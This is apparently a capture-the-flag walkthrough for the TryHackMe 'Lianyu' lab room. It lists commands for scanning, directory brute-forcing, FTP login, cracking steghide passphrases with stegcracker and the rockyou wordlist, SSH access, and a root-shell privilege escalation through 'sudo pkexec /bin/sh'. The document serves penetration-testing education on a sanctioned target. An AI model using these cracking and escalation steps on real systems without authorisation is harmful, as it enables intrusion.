Step 1 : Connect to TryHackMe and start target machine
- Connect to TryHackMe by entering command :
sudo openvpn /pathtoOVPNfile.ovpn
2. Start machine in ‘lianyu’ room — target ip address will be displayed in a minute.
Step 2 : Information gathering using Nmap and gobuster
- Start nmap scan of the target ip:
nmap -A -O <target ip>
Open ports:
21 — ftp vsftpd 3.0.2
22 — ssh
80 — http apache
111 — rpcbind 2–4
2. Accessing open ports:
port 80
3. Using gobuster for directory traversal:
gobuster dir -u http://10.10.97.179/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
4. Navigating to found directory /island and viewing the source code:
5. Navigating further through gobuster :
gobuster dir -u http://10.10.97.179/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
6. Navigating to new folder found: Found information on .<foldername> hidden folder
7. Using gobuster with -x flag to find the hidden folder:
gobuster dir -u http://10.10.97.179/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .<dirnameFromabove>
8. Navigating to the above hidden folder and hint is found: which upon searching on google needs to be decoded with base 58
9. Now logging in with initial username found to ftp service:
Try to login with ftp with vigilante username and base 58 decoded password:
ftp <targetip>
10. Transferring files found from ftp to local:
Also navigating to different folder found other user’s name: It will be useful while logging in through ssh service
11. Using Stegcrack on all transfered files to bruteforce and find password for steghide:
stegcracker <filename>.jpg /usr/share/wordlists/rockyou.txt
12. Using steghide to find the hidden files:
steghide — extract -sf <filename>.jpg
13. Unzip the files to find the password in shado file for ssh login:
14. Login with other user found through ftp login:
ssh <username>@<target ip>
15. After looking around, found ‘user.txt’ file:
16. Checking for privilege escalation:
sudo -l
17. Searching through gtfobins and found below command:
sudo pkexec /bin/sh
18. Found root.txt
With these steps, I was able to answer all the questions posted in lainyu room on TryHackMe.